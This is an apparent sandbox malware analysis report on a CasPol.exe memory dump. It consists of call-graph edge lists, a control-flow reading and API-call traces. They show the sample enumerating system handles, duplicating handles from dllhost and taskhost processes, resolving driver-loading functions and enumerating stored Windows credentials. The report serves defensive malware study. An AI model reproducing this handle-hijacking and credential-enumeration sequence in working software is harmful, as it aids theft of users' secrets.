37559->37599 37600 42413a 90 API calls 37559->37600 37560->37559 37607 415c56 11 API calls 37561->37607 37566 429a96 37562->37566 37609 416760 11 API calls 37562->37609 37603 415c56 11 API calls 37564->37603 37610 424251 120 API calls 37566->37610 37569 429a7a 37608 416760 11 API calls 37569->37608 37574->37558 37598 415c56 11 API calls 37574->37598 37577->37574 37601 422640 13 API calls 37577->37601 37602 4226e0 12 API calls 37577->37602 37579 42014c 37578->37579 37582 420151 37578->37582 37621 41e466 97 API calls 37579->37621 37581 420162 37581->37559 37582->37581 37583 4201b3 37582->37583 37584 420229 37582->37584 37585 4201b8 37583->37585 37586 4201dc 37583->37586 37584->37581 37587 41fd5e 86 API calls 37584->37587 37612 41fbdb 37585->37612 37586->37581 37590 4201ff 37586->37590 37618 41fc4c 37586->37618 37587->37581 37590->37581 37593 42013a 97 API calls 37590->37593 37593->37581 37594->37559 37595->37559 37596->37559 37597->37559 37598->37552 37599->37559 37600->37559 37601->37577 37602->37577 37603->37552 37604->37550 37605->37558 37606->37559 37607->37569 37608->37566 37609->37566 37610->37543 37611->37552 37613 41fbf8 37612->37613 37616 41fbf1 37612->37616 37626 41ee26 37613->37626 37617 41fc39 37616->37617 37636 4446ce 11 API calls 37616->37636 37617->37581 37622 41fd5e 37617->37622 37619 41ee6b 86 API calls 37618->37619 37620 41fc5d 37619->37620 37620->37586 37621->37582 37624 41fd65 37622->37624 37623 41fdab 37623->37581 37624->37623 37625 41fbdb 86 API calls 37624->37625 37625->37624 37627 41ee41 37626->37627 37628 41ee32 37626->37628 37637 41edad 37627->37637 37640 4446ce 11 API calls 37628->37640 37631 41ee3c 37631->37616 37634 41ee58 37634->37631 37642 41ee6b 37634->37642 37636->37617 37646 41be52 37637->37646 37640->37631 37641 41eb85 11 API calls 37641->37634 37643 41ee70 37642->37643 37644 41ee78 37642->37644 37702 41bf99 86 API calls 37643->37702 37644->37631 37647 41be6f 37646->37647 37648 41be5f 37646->37648 37653 41be8c 37647->37653 37667 
418c63 37647->37667 37681 4446ce 11 API calls 37648->37681 37651 41be69 37651->37631 37651->37641 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37658 41bee7 37653->37658 37684 4446ce 11 API calls 37654->37684 37657 41bef0 37655->37657 37661 41bee2 37655->37661 37657->37658 37659 41bf01 37657->37659 37658->37651 37685 41a453 86 API calls 37658->37685 37660 41bf24 memset 37659->37660 37665 41bf14 37659->37665 37682 418a6d memset memcpy memset 37659->37682 37660->37651 37671 41ac13 37661->37671 37683 41a223 memset memcpy memset 37665->37683 37666 41bf20 37666->37660 37670 418c72 37667->37670 37668 418c94 37668->37653 37669 418d51 memset memset 37669->37668 37670->37668 37670->37669 37672 41ac52 37671->37672 37673 41ac3f memset 37671->37673 37675 41ac6a 37672->37675 37686 41dc14 19 API calls 37672->37686 37678 41acd9 37673->37678 37677 41aca1 37675->37677 37687 41519d 37675->37687 37677->37678 37679 41acc0 memset 37677->37679 37680 41accd memcpy 37677->37680 37678->37658 37679->37678 37680->37678 37681->37651 37682->37665 37683->37666 37684->37658 37686->37675 37690 4175ed 37687->37690 37698 417570 SetFilePointer 37690->37698 37693 41760a ReadFile 37694 417637 37693->37694 37695 417627 GetLastError 37693->37695 37696 41763e memset 37694->37696 37697 4151b3 37694->37697 37695->37697 37696->37697 37697->37677 37699 4175b2 37698->37699 37700 41759c GetLastError 37698->37700 37699->37693 37699->37697 37700->37699 37701 4175a8 GetLastError 37700->37701 37701->37699 37702->37644 37703 417bc5 37704 417c61 37703->37704 37705 417bda 37703->37705 37705->37704 37706 417bf6 UnmapViewOfFile CloseHandle 37705->37706 37708 417c2c 37705->37708 37710 4175b7 37705->37710 37706->37705 37706->37706 37708->37705 37715 41851e 20 API calls 37708->37715 37711 4175d6 CloseHandle 37710->37711 37712 4175c8 37711->37712 37713 4175df 37711->37713 37712->37713 37714 4175ce Sleep 37712->37714 37713->37705 37714->37711 37715->37708 37722 4415ea 37730 4304b2 37722->37730 37724 
4415fe 37725 4418ea 37724->37725 37726 442bd4 37724->37726 37727 4418e2 37724->37727 37726->37725 37778 441409 memset 37726->37778 37727->37725 37777 4414a9 12 API calls 37727->37777 37779 43041c 12 API calls 37730->37779 37732 4304cd 37737 430557 37732->37737 37780 43034a 37732->37780 37734 4304f3 37734->37737 37784 430468 11 API calls 37734->37784 37736 430506 37736->37737 37738 43057b 37736->37738 37785 43817e 37736->37785 37737->37724 37790 415a91 37738->37790 37743 4305e4 37743->37737 37795 4328e4 12 API calls 37743->37795 37745 43052d 37745->37737 37745->37738 37748 430542 37745->37748 37747 4305fa 37749 430609 37747->37749 37796 423383 11 API calls 37747->37796 37748->37737 37789 4169a7 11 API calls 37748->37789 37797 423330 11 API calls 37749->37797 37752 430634 37798 423399 11 API calls 37752->37798 37754 430648 37799 4233ae 11 API calls 37754->37799 37756 43066b 37800 423330 11 API calls 37756->37800 37758 43067d 37801 4233ae 11 API calls 37758->37801 37760 430695 37802 423330 11 API calls 37760->37802 37762 4306d6 37804 423330 11 API calls 37762->37804 37763 4306a7 37763->37762 37764 4306c0 37763->37764 37803 4233ae 11 API calls 37764->37803 37767 4306d1 37805 430369 17 API calls 37767->37805 37769 4306f3 37806 423330 11 API calls 37769->37806 37771 430704 37807 423330 11 API calls 37771->37807 37773 430710 37808 423330 11 API calls 37773->37808 37775 43071e 37809 423383 11 API calls 37775->37809 37777->37725 37778->37726 37779->37732 37781 43034e 37780->37781 37783 430359 37780->37783 37810 415c23 memcpy 37781->37810 37783->37734 37784->37736 37786 438187 37785->37786 37788 438192 37785->37788 37811 4380f6 37786->37811 37788->37745 37789->37737 37791 415a9d 37790->37791 37792 415ab3 37791->37792 37793 415aa4 memset 37791->37793 37792->37737 37794 4397fd memset 37792->37794 37793->37792 37794->37743 37795->37747 37796->37749 37797->37752 37798->37754 37799->37756 37800->37758 37801->37760 37802->37763 37803->37767 37804->37767 37805->37769 37806->37771 
37807->37773 37808->37775 37809->37737 37810->37783 37813 43811f 37811->37813 37812 438164 37812->37788 37813->37812 37816 437e5e 37813->37816 37839 4300e8 memset memset memcpy 37813->37839 37840 437d3c 37816->37840 37818 437eb3 37818->37813 37819 437ea9 37819->37818 37824 437f22 37819->37824 37855 41f432 37819->37855 37822 437f06 37905 415c56 11 API calls 37822->37905 37826 437f7f 37824->37826 37906 432d4e 37824->37906 37825 437f95 37910 415c56 11 API calls 37825->37910 37826->37825 37828 43802b 37826->37828 37866 4165ff 37828->37866 37830 437fa3 37830->37818 37913 41f638 104 API calls 37830->37913 37835 43806b 37836 438094 37835->37836 37911 42f50e 138 API calls 37835->37911 37836->37830 37912 4300e8 memset memset memcpy 37836->37912 37839->37813 37841 437d69 37840->37841 37844 437d80 37840->37844 37926 437ccb 11 API calls 37841->37926 37843 437d76 37843->37819 37844->37843 37845 437da3 37844->37845 37847 437d90 37844->37847 37914 438460 37845->37914 37847->37843 37930 437ccb 11 API calls 37847->37930 37849 437de8 37929 424f26 123 API calls 37849->37929 37851 437dcb 37851->37849 37927 444283 13 API calls 37851->37927 37853 437dfc 37928 437ccb 11 API calls 37853->37928 37856 41f54d 37855->37856 37860 41f44f 37855->37860 37857 41f466 37856->37857 38101 41c635 memset memset 37856->38101 37857->37822 37857->37824 37860->37857 37864 41f50b 37860->37864 38072 41f1a5 37860->38072 38097 41c06f memcmp 37860->38097 38098 41f3b1 90 API calls 37860->38098 38099 41f398 86 API calls 37860->38099 37864->37856 37864->37857 38100 41c295 86 API calls 37864->38100 37867 4165a0 11 API calls 37866->37867 37868 41660d 37867->37868 37869 437371 37868->37869 37870 41703f 11 API calls 37869->37870 37871 437399 37870->37871 37872 43739d 37871->37872 37874 4373ac 37871->37874 38206 4446ea 11 API calls 37872->38206 37875 416935 16 API calls 37874->37875 37891 4373ca 37875->37891 37876 437584 37878 4375bc 37876->37878 38213 42453e 123 API calls 37876->38213 37877 438460 134 API calls 
37877->37891 37880 415c7d 16 API calls 37878->37880 37881 4375d2 37880->37881 37885 4373a7 37881->37885 38214 4442e6 37881->38214 37884 4375e2 37884->37885 38221 444283 13 API calls 37884->38221 37885->37835 37887 415a91 memset 37887->37891 37890 43758f 38212 42453e 123 API calls 37890->38212 37891->37876 37891->37877 37891->37887 37891->37890 37904 437d3c 135 API calls 37891->37904 38188 4251c4 37891->38188 38207 425433 13 API calls 37891->38207 38208 425413 17 API calls 37891->38208 38209 42533e 16 API calls 37891->38209 38210 42538f 16 API calls 37891->38210 38211 42453e 123 API calls 37891->38211 37894 4375f4 37898 437620 37894->37898 37899 43760b 37894->37899 37896 43759f 37897 416935 16 API calls 37896->37897 37897->37876 37900 416935 16 API calls 37898->37900 38222 444283 13 API calls 37899->38222 37900->37885 37903 437612 memcpy 37903->37885 37904->37891 37905->37818 37907 432d58 37906->37907 37909 432d65 37906->37909 38297 432cc4 memset memset memcpy 37907->38297 37909->37826 37910->37830 37911->37836 37912->37830 37913->37818 37931 41703f 37914->37931 37916 43847a 37917 43848a 37916->37917 37918 43847e 37916->37918 37938 438270 37917->37938 37968 4446ea 11 API calls 37918->37968 37922 438488 37922->37851 37924 4384bb 37925 438270 134 API calls 37924->37925 37925->37922 37926->37843 37927->37853 37928->37849 37929->37843 37930->37843 37932 417044 37931->37932 37933 41705c 37931->37933 37937 417055 37932->37937 37970 416760 11 API calls 37932->37970 37934 417075 37933->37934 37971 41707a 11 API calls 37933->37971 37934->37916 37937->37916 37939 415a91 memset 37938->37939 37940 43828d 37939->37940 37941 438297 37940->37941 37942 438341 37940->37942 37944 4382d6 37940->37944 37943 415c7d 16 API calls 37941->37943 37972 44358f 37942->37972 37946 438458 37943->37946 37947 4382fb 37944->37947 37948 4382db 37944->37948 37946->37922 37969 424f26 123 API calls 37946->37969 38015 415c23 memcpy 37947->38015 38003 416935 37948->38003 37951 438305 37955 44358f 19 API 
calls 37951->37955 37957 438318 37951->37957 37952 4382e9 38011 415c7d 37952->38011 37954 438373 37960 438383 37954->37960 38016 4300e8 memset memset memcpy 37954->38016 37955->37957 37957->37954 37998 43819e 37957->37998 37959 4383cd 37961 4383f5 37959->37961 38018 42453e 123 API calls 37959->38018 37960->37959 38017 415c23 memcpy 37960->38017 37964 438404 37961->37964 37965 43841c 37961->37965 37967 416935 16 API calls 37964->37967 37966 416935 16 API calls 37965->37966 37966->37941 37967->37941 37968->37922 37969->37924 37970->37937 37971->37932 37973 4435be 37972->37973 37974 44360c 37973->37974 37976 443676 37973->37976 37979 4436ce 37973->37979 37983 44366c 37973->37983 38019 442ff8 37973->38019 37974->37957 37975 443758 37988 443775 37975->37988 38028 441409 memset 37975->38028 37976->37975 37978 443737 37976->37978 37980 442ff8 19 API calls 37976->37980 37981 442ff8 19 API calls 37978->37981 37985 4165ff 11 API calls 37979->37985 37980->37978 37981->37975 38027 4169a7 11 API calls 37983->38027 37984 4437be 37989 4437de 37984->37989 38030 416760 11 API calls 37984->38030 37985->37976 37988->37984 38029 415c56 11 API calls 37988->38029 37992 443801 37989->37992 38031 42463b memset memcpy 37989->38031 37991 443826 38033 43bd08 memset 37991->38033 37992->37991 38032 43024d memset 37992->38032 37996 443837 37996->37974 38034 43024d memset 37996->38034 37999 438246 37998->37999 38001 4381ba 37998->38001 37999->37954 38000 41f432 110 API calls 38000->38001 38001->37999 38001->38000 38050 41f638 104 API calls 38001->38050 38004 41693e 38003->38004 38007 41698e 38003->38007 38005 41694c 38004->38005 38051 422fd1 memset 38004->38051 38005->38007 38052 4165a0 38005->38052 38007->37952 38012 415c81 38011->38012 38013 415c9c 38011->38013 38012->38013 38014 416935 16 API calls 38012->38014 38013->37941 38014->38013 38015->37951 38016->37960 38017->37959 38018->37961 38020 442ffe 38019->38020 38021 443094 38020->38021 38023 443092 38020->38023 38035 4414ff 38020->38035 
38047 4169a7 11 API calls 38020->38047 38048 441325 memset 38020->38048 38049 4414a9 12 API calls 38021->38049 38023->37973 38027->37976 38028->37975 38029->37984 38030->37989 38031->37992 38032->37991 38033->37996 38034->37996 38036 441539 38035->38036 38037 441547 38035->38037 38036->38037 38038 441575 38036->38038 38039 441582 38036->38039 38040 4418e2 38037->38040 38046 442bd4 38037->38046 38042 42fccf 18 API calls 38038->38042 38041 43275a 12 API calls 38039->38041 38043 4414a9 12 API calls 38040->38043 38044 4418ea 38040->38044 38041->38037 38042->38037 38043->38044 38044->38020 38045 441409 memset 38045->38046 38046->38044 38046->38045 38047->38020 38048->38020 38049->38023 38050->38001 38051->38005 38058 415cfe 38052->38058 38057 422b84 15 API calls 38057->38007 38059 41628e 38058->38059 38064 415d23 __aullrem __aulldvrm 38058->38064 38066 416520 38059->38066 38060 4163ca 38061 416422 10 API calls 38060->38061 38061->38059 38062 416422 10 API calls 38062->38064 38063 416172 memset 38063->38064 38064->38059 38064->38060 38064->38062 38064->38063 38065 415cb9 10 API calls 38064->38065 38065->38064 38067 416527 38066->38067 38071 416574 38066->38071 38068 415700 10 API calls 38067->38068 38069 416544 38067->38069 38067->38071 38068->38069 38070 416561 memcpy 38069->38070 38069->38071 38070->38071 38071->38007 38071->38057 38102 41bc3b 38072->38102 38075 41edad 86 API calls 38076 41f1cb 38075->38076 38077 41f1f5 memcmp 38076->38077 38078 41f20e 38076->38078 38082 41f282 38076->38082 38077->38078 38079 41f21b memcmp 38078->38079 38078->38082 38080 41f326 38079->38080 38083 41f23d 38079->38083 38081 41ee6b 86 API calls 38080->38081 38080->38082 38081->38082 38082->37860 38083->38080 38084 41f28e memcmp 38083->38084 38126 41c8df 56 API calls 38083->38126 38084->38080 38085 41f2a9 38084->38085 38085->38080 38088 41f308 38085->38088 38089 41f2d8 38085->38089 38087 41f269 38087->38080 38090 41f287 38087->38090 38091 41f27a 38087->38091 38088->38080 38128 4446ce 11 
API calls 38088->38128 38092 41ee6b 86 API calls 38089->38092 38090->38084 38093 41ee6b 86 API calls 38091->38093 38094 41f2e0 38092->38094 38093->38082 38127 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38094->38127 38097->37860 38098->37860 38099->37860 38100->37856 38101->37857 38104 41bc54 38102->38104 38111 41be0b 38102->38111 38107 41bd61 38104->38107 38104->38111 38119 41bc8d 38104->38119 38129 41baf0 55 API calls 38104->38129 38106 41be45 38106->38075 38106->38082 38107->38106 38138 41a25f memset 38107->38138 38109 41be04 38136 41aee4 56 API calls 38109->38136 38111->38107 38137 41ae17 34 API calls 38111->38137 38112 41bd42 38112->38107 38112->38109 38113 41bdd8 memset 38112->38113 38114 41bdba 38112->38114 38115 41bde7 memcmp 38113->38115 38125 4175ed 6 API calls 38114->38125 38115->38109 38118 41bdfd 38115->38118 38116 41bd18 38116->38107 38116->38112 38134 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38116->38134 38117 41bdcc 38117->38107 38117->38115 38135 41a1b0 memset 38118->38135 38119->38107 38119->38112 38119->38116 38130 4151e3 38119->38130 38125->38117 38126->38087 38127->38082 38128->38080 38129->38119 38139 41837f 38130->38139 38133 444706 11 API calls 38133->38116 38134->38112 38135->38109 38136->38111 38137->38107 38138->38106 38140 4183c1 38139->38140 38143 4183ca 38139->38143 38186 418197 25 API calls 38140->38186 38144 4151f9 38143->38144 38160 418160 38143->38160 38144->38116 38144->38133 38145 4183e5 38145->38144 38169 41739b 38145->38169 38148 418444 CreateFileW 38150 418477 38148->38150 38149 41845f CreateFileA 38149->38150 38151 4184c2 memset 38150->38151 38152 41847e GetLastError free 38150->38152 38172 418758 38151->38172 38153 4184b5 38152->38153 38154 418497 38152->38154 38187 444706 11 API calls 38153->38187 38156 41837f 49 API calls 38154->38156 38156->38144 38161 41739b GetVersionExW 38160->38161 38162 418165 38161->38162 38164 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 
38162->38164 38165 418178 38164->38165 38166 41817f 38165->38166 38167 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38165->38167 38166->38145 38168 418188 free 38167->38168 38168->38145 38170 4173d6 38169->38170 38171 4173ad GetVersionExW 38169->38171 38170->38148 38170->38149 38171->38170 38173 418680 43 API calls 38172->38173 38174 418782 38173->38174 38175 418160 11 API calls 38174->38175 38177 418506 free 38174->38177 38176 418799 38175->38176 38176->38177 38178 41739b GetVersionExW 38176->38178 38177->38144 38179 4187a7 38178->38179 38180 4187da 38179->38180 38181 4187ad GetDiskFreeSpaceW 38179->38181 38183 4187ec GetDiskFreeSpaceA 38180->38183 38185 4187e8 38180->38185 38184 418800 free 38181->38184 38183->38184 38184->38177 38185->38183 38186->38143 38187->38144 38223 424f07 38188->38223 38190 4251e4 38191 4251f7 38190->38191 38192 4251e8 38190->38192 38231 4250f8 38191->38231 38230 4446ea 11 API calls 38192->38230 38194 4251f2 38194->37891 38196 425209 38199 425249 38196->38199 38202 4250f8 127 API calls 38196->38202 38203 425287 38196->38203 38239 4384e9 135 API calls 38196->38239 38240 424f74 124 API calls 38196->38240 38197 415c7d 16 API calls 38197->38194 38199->38203 38241 424ff0 13 API calls 38199->38241 38202->38196 38203->38197 38204 425266 38204->38203 38242 415be9 memcpy 38204->38242 38206->37885 38207->37891 38208->37891 38209->37891 38210->37891 38211->37891 38212->37896 38213->37878 38215 4442eb 38214->38215 38218 444303 38214->38218 38295 41707a 11 API calls 38215->38295 38217 4442f2 38217->38218 38296 4446ea 11 API calls 38217->38296 38218->37884 38220 444300 38220->37884 38221->37894 38222->37903 38224 424f1f 38223->38224 38225 424f0c 38223->38225 38244 424eea 11 API calls 38224->38244 38243 416760 11 API calls 38225->38243 38228 424f18 38228->38190 38229 424f24 38229->38190 38230->38194 38232 425108 38231->38232 38238 42510d 38231->38238 38277 424f74 124 API calls 38232->38277 38235 42516e 38237 415c7d 16 API 
calls 38235->38237 38236 425115 38236->38196 38237->38236 38238->38236 38245 42569b 38238->38245 38239->38196 38240->38196 38241->38204 38242->38203 38243->38228 38244->38229 38255 4256f1 38245->38255 38273 4259c2 38245->38273 38250 4260dd 38289 424251 120 API calls 38250->38289 38254 429a4d 38257 429a66 38254->38257 38258 429a9b 38254->38258 38255->38254 38256 422aeb memset memcpy memcpy 38255->38256 38260 4260a1 38255->38260 38269 4259da 38255->38269 38271 429ac1 38255->38271 38255->38273 38276 425a38 38255->38276 38278 4227f0 memset memcpy 38255->38278 38279 422b84 15 API calls 38255->38279 38280 422b5d memset memcpy memcpy 38255->38280 38281 422640 13 API calls 38255->38281 38283 4241fc 11 API calls 38255->38283 38284 42413a 90 API calls 38255->38284 38256->38255 38290 415c56 11 API calls 38257->38290 38262 429a96 38258->38262 38292 416760 11 API calls 38258->38292 38287 415c56 11 API calls 38260->38287 38293 424251 120 API calls 38262->38293 38265 429a7a 38291 416760 11 API calls 38265->38291 38288 416760 11 API calls 38269->38288 38272 425ad6 38271->38272 38294 415c56 11 API calls 38271->38294 38272->38235 38273->38272 38282 415c56 11 API calls 38273->38282 38276->38273 38285 422640 13 API calls 38276->38285 38286 4226e0 12 API calls 38276->38286 38277->38238 38278->38255 38279->38255 38280->38255 38281->38255 38282->38269 38283->38255 38284->38255 38285->38276 38286->38276 38287->38269 38288->38250 38289->38272 38290->38265 38291->38262 38292->38262 38293->38271 38294->38269 38295->38217 38296->38220 38297->37909 40161 4147f3 40164 414561 40161->40164 40163 414813 40165 41456d 40164->40165 40166 41457f GetPrivateProfileIntW 40164->40166 40169 4143f1 memset _itow WritePrivateProfileStringW 40165->40169 40166->40163 40168 41457a 40168->40163 40169->40168

Control-flow Graph

• Executed
• Not Executed

Basic blocks of the routine at 0x40dd85 in the CasPol.exe memory dump (the exported graph is an edge list; blocks are given here in execution order with their API calls and named subroutines, and the edges that matter are summarized):

• 338  40dd85-40ddeb  memset, call 409bca (GetModuleFileNameW), CreateFileW
• 341  40ddf1-40de09  call 40afcf (operator new), call 41352f (ntdll resolver)
• 346  40de0b-40de1a  NtQuerySystemInformation
• 348/349  40de20-40de39  status check; 349 branches back to 341 or on to 350
• 350  40de3b-40de52  CloseHandle, GetCurrentProcessId
• 351, 354, 356, 358, 359, 361  40de54-40de78  walk over the returned table, no API calls
• 352  40de7a-40de8e  call 413cfa, call 413d4c (per-process loop head; 358 and 350 lead here)
• 362  40de94-40debb  call 40e6ad, call 409c52, _wcsicmp
• 371  40debd-40dece  _wcsicmp
• 372  40ded0-40dee1  _wcsicmp
• 370  40dee7-40def7  OpenProcess (reached from 362, 371 and 372)
• 374, 376, 378, 379, 380  40defd-40df1d, 40dfbd-40dfcb  inner loop over table entries
• 381  40df23-40df4a  GetCurrentProcess, DuplicateHandle
• 383  40df4c-40df76  memset, call 41352f
• 387  40df8f-40dfbb  CloseHandle, call 409c52 (twice), _wcsicmp
• 392  40dfd5-40dfed  taken when the last _wcsicmp matches; no API calls, falls through to 377
• 377  40dfef-40dff2  CloseHandle
• 373/375  40dff8-40e006  advance to next process or exit
• 363  40e00c-40e01b  call 413d29 (exit)

Reading of the trace: the first argument of each call in the API list below is reliable; the remaining columns are stack snapshots and include stale values (the C0000004 shown as the CloseHandle "handle" is a leftover NTSTATUS). With that in mind the constants are explicit. CreateFileW opens the sample's own image path (from GetModuleFileNameW) with GENERIC_READ (0x80000000), FILE_SHARE_READ | FILE_SHARE_WRITE (0x3) and OPEN_EXISTING (0x3). NtQuerySystemInformation is called with class 0x10 (SystemHandleInformation), a 0x1000-byte buffer and a NULL ReturnLength; the back edge 349 -> 341 and the 0xC0000004 (STATUS_INFO_LENGTH_MISMATCH) still on the stack at the next CloseHandle are the usual allocate-grow-retry loop. Each process name is compared case-insensitively against dllhost.exe, taskhost.exe and taskhostex.exe (three _wcsicmp calls); a match leads to OpenProcess with 0x40 (PROCESS_DUP_HANDLE), DuplicateHandle into the current process, a second call into the resolver at 41352f (which also resolves NtQueryObject) and a final _wcsicmp. This is the handle-table enumeration pattern used to find which of those host processes holds a handle whose name matches a path the sample cares about; what the routine does once block 392 is reached contains no API calls and cannot be recovered from this view.
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0

APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
